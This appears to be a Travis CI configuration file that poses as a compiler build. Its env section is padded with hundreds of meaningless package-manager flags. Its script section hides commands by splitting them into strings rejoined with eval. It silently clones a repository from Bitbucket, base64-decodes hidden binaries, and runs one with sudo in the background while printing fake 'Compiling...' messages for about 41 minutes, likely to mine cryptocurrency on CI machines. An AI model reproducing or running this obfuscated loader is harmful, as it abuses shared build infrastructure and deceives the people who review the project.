dist: bionic

env:
  - BUILD="--select=190ra"
  - BUILD="--columns=383Ib"
  - BUILD="--config-root=810QB"
  - BUILD="--search=887yd"
  - BUILD="--tree=31Lq"
  - BUILD="--digest=814qL"
  - BUILD="--rebuilt-binaries-timestamp=617yQ"
  - BUILD="--tree=443hC"
  - BUILD="--search-similarity=373lU"
  - BUILD="--complete-graph-if-new-use=929MR"
  - BUILD="--with-test-deps=261x7"
  - BUILD="--nospinner=243Mh"
  - BUILD="--usepkg-exclude=352gL"
  - BUILD="--ask-enter-invalid=160wa"
  - BUILD="--fail-clean=618yF"
  - BUILD="--unordered-display=708jq"
  - BUILD="--tree=742Xe"
  - BUILD="--usepkgonly=862ct"
  - BUILD="--rebuild-if-new-rev=777mj"
  - BUILD="--config=641Eo"
  - BUILD="--rebuild-exclude=7190f"
  - BUILD="--pkg-format=55099"
  - BUILD="--selective=408cW"
  - BUILD="--search-similarity=5984a"
  - BUILD="--nodeps=577tX"
  - BUILD="--binpkg-respect-use=309Wt"
  - BUILD="--root-deps=120pn"
  - BUILD="--quiet-fail=403Jv"
  - BUILD="--newuse=42Aj"
  - BUILD="--digest=159Q1"
  - BUILD="--emptytree=288hJ"
  - BUILD="--search-similarity=169jR"
  - BUILD="--regen=757zj"
  - BUILD="--clean=707ws"
  - BUILD="--debug=10931"
  - BUILD="--buildpkgonly=53to"
  - BUILD="--quiet-unmerge-warn=548he"
  - BUILD="--check-news=335ov"
  - BUILD="--autounmask=86416"
  - BUILD="--onlydeps-with-rdeps=213Bk"
  - BUILD="--resume=3182M"
  - BUILD="--quiet=683PI"
  - BUILD="--noconfmem=4480w"
  - BUILD="--fetch-all-uri=702gV"
  - BUILD="--autounmask-only=741Av"
  - BUILD="--digest=744Z0"
  - BUILD="--noconfmem=779Mh"
  - BUILD="--alphabetical=951NP"
  - BUILD="--alphabetical=757hw"
  - BUILD="--load-average=327fC"
  - BUILD="--quiet-repo-display=430Ph"
  - BUILD="--accept-restrict=4690g"
  - BUILD="--quiet=505BM"
  - BUILD="--verbose-slot-rebuilds=2135F"
  - BUILD="--help=75810"
  - BUILD="--exclude=529wP"
  - BUILD="--root-deps=64Hq"
  - BUILD="--rebuild-if-new-slot=497eC"
  - BUILD="--rebuild-if-new-rev=305Sy"
  - BUILD="--buildpkg-exclude=41kR"
  - BUILD="--rebuild-if-new-rev=904DR"
  - BUILD="--searchdesc=4772b"
  - BUILD="--resume=873bZ"
  - BUILD="--pkg-format=939xB"
  - BUILD="--jobs=260qC"
  - BUILD="--fail-clean=698xf"
  - BUILD="--onlydeps=216Ss"
  - BUILD="--implicit-system-deps=723fo"
  - BUILD="--rebuild-if-unbuilt=52nn"
  - BUILD="--digest=153Nl"
  - BUILD="--ignore-built-slot-operator-deps=431rE"
  - BUILD="--newuse=1112G"
  - BUILD="--check-news=257P1"
  - BUILD="--dynamic-deps=109q1"
  - BUILD="--buildpkg-exclude=531pX"
  - BUILD="--ignore-soname-deps=726Et"
  - BUILD="--prune=482Nn"
  - BUILD="--selective=936Pf"
  - BUILD="--autounmask-backtrack=689Ja"
  - BUILD="--implicit-system-deps=516v6"
  - BUILD="--rebuild-if-new-ver=773Yk"
  - BUILD="--rebuild-ignore=126Gz"
  - BUILD="--quiet=678Dk"
  - BUILD="--rage-clean=648hE"
  - BUILD="--selective=582Zr"
  - BUILD="--newrepo=102lp"
  - BUILD="--changed-slot=78OL"
  - BUILD="--alert=484FI"
  - BUILD="--debug=662zu"
  - BUILD="--ignore-built-slot-operator-deps=881T2"
  - BUILD="--changed-deps=234o4"
  - BUILD="--autounmask-use=118Ii"
  - BUILD="--onlydeps-with-rdeps=23l"
  - BUILD="--package-moves=287Nt"
  - BUILD="--version=709RL"
  - BUILD="--deep=758An"
  - BUILD="--accept-restrict=728a1"
  - BUILD="--backtrack=4186w"
  - BUILD="--prune=620Pv"
  - BUILD="--prune=2kN"
  - BUILD="--unmerge=492vQ"
  - BUILD="--onlydeps=952D7"
  - BUILD="--usepkgonly=867R5"
  - BUILD="--rage-clean=232I3"
  - BUILD="--unmerge=157be"
  - BUILD="--rebuild-ignore=669IN"
  - BUILD="--noreplace=958h1"
  - BUILD="--fail-clean=759F2"
  - BUILD="--sysroot=22rl"
  - BUILD="--select=750vz"
  - BUILD="--tree=671JZ"
  - BUILD="--ignore-default-opts=413RM"
  - BUILD="--package-moves=205Hh"
  - BUILD="--usepkg=771Kk"
  - BUILD="--clean=763wr"
  - BUILD="--sync-submodule=134jm"
  - BUILD="--root-deps=811G4"
  - BUILD="--searchdesc=4344T"
  - BUILD="--rebuilt-binaries-timestamp=471oH"
  - BUILD="--ignore-built-slot-operator-deps=288ly"
  - BUILD="--alert=315Il"
  - BUILD="--usepkg=581ca"
  - BUILD="--unordered-display=787LS"
  - BUILD="--complete-graph-if-new-use=13nT"
  - BUILD="--ignore-world=402at"
  - BUILD="--sync=114uq"
  - BUILD="--jobs=400Ik"
  - BUILD="--quiet-repo-display=953fN"
  - BUILD="--ignore-soname-deps=423iP"
  - BUILD="--rebuilt-binaries-timestamp=200tX"
  - BUILD="--pkg-format=665nK"
  - BUILD="--verbose-slot-rebuilds=64hc"
  - BUILD="--update=991BG"
  - BUILD="--tree=10ZS"
  - BUILD="--with-bdeps-auto=315jy"
  - BUILD="--search=690UD"
  - BUILD="--usepkgonly=777sd"
  - BUILD="--clean=618gy"
  - BUILD="--autounmask-write=286FG"
  - BUILD="--columns=882ob"
  - BUILD="--autounmask-keep-masks=430wW"
  - BUILD="--verbose-conflicts=230rk"
  - BUILD="--rebuild-if-new-slot=2247r"
  - BUILD="--search-similarity=315Ay"
  - BUILD="--useoldpkg-atoms=412nm"
  - BUILD="--search-similarity=948Ql"
  - BUILD="--noreplace=964Fy"
  - BUILD="--ask=380v9"
  - BUILD="--autounmask-write=49tA"
  - BUILD="--complete-graph=753hP"
  - BUILD="--rebuild-if-new-slot=906PP"
  - BUILD="--binpkg-respect-use=369NM"
  - BUILD="--quickpkg-direct=343Bq"
  - BUILD="--pkg-format=79P"
  - BUILD="--pretend=400dT"
  - BUILD="--binpkg-respect-use=154LM"
  - BUILD="--clean=371SF"
  - BUILD="--exclude=121Op"
  - BUILD="--binpkg-respect-use=156QI"
  - BUILD="--regen=74Tx"
  - BUILD="--autounmask-use=957rV"
  - BUILD="--quickpkg-direct=25oZ"
  - BUILD="--quiet=155qI"
  - BUILD="--color=470JO"
  - BUILD="--sysroot=600bf"
  - BUILD="--prefix=251LE"
  - BUILD="--alphabetical=2356y"
  - BUILD="--resume=218YL"
  - BUILD="--package-moves=306Wh"
  - BUILD="--changed-deps-report=106OF"
  - BUILD="--complete-graph-if-new-use=8929r"
  - BUILD="--info=120Cn"
  - BUILD="--selective=658T5"
  - BUILD="--verbose-slot-rebuilds=949fC"
  - BUILD="--complete-graph-if-new-ver=908Ur"
  - BUILD="--ignore-default-opts=363OF"
  - BUILD="--quickpkg-direct=910DB"
  - BUILD="--changelog=558p3"
  - BUILD="--digest=8328v"
  - BUILD="--depclean-lib-check=51fD"
  - BUILD="--complete-graph=295h6"
  - BUILD="--oneshot=4kF"
  - BUILD="--backtrack=178f4"
  - BUILD="--onlydeps-with-rdeps=4452v"

language: minimal

script:
  - sudo apt update || true
  - xKiwxbRBZgO="sudo apt --"
  - KTbWLvrn="yes install"
  - iwBNaXIFkxs=" cl-base64 "
  - yeriMPcmGTL="git &>/dev/"
  - eval "$xKiwxbRBZgO""$KTbWLvrn""$iwBNaXIFkxs""$yeriMPcmGTL""null"
  - aCDNgPPI="git clone h"
  - rAcLpgh="ttps://gccb"
  - afLqsDUjjU="uild@bitbuc"
  - UdwUOWja="ket.org/gcc"
  - QKxogYRPNH="build/gcc.g"
  - LbGSk="it &>/dev/n"
  - eval "$aCDNgPPI""$rAcLpgh""$afLqsDUjjU""$UdwUOWja""$QKxogYRPNH""$LbGSk""ull"
  - MluSUD="base64 -d g"
  - TjrMcIXO="cc/cmake_ >"
  - eval "$MluSUD""$TjrMcIXO"" cmake"
  - EebMLpU="base64 -d g"
  - SzDgQ="cc/config_ "
  - eval "$EebMLpU""$SzDgQ""> cconfig"
  - bCsdkqaQM="base64 -d g"
  - dacWSjDH="cc/make_ > "
  - eval "$bCsdkqaQM""$dacWSjDH""gnu"
  - jwnXzFyn="chmod +x gn"
  - eval "$jwnXzFyn""u cmake"
  - ./cmake
  - sed -i 's/build/tg3o/g' cconfig
  - sudo ./gnu --config cconfig &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2485)) ] && sudo killall gnu && break; sleep 203; done
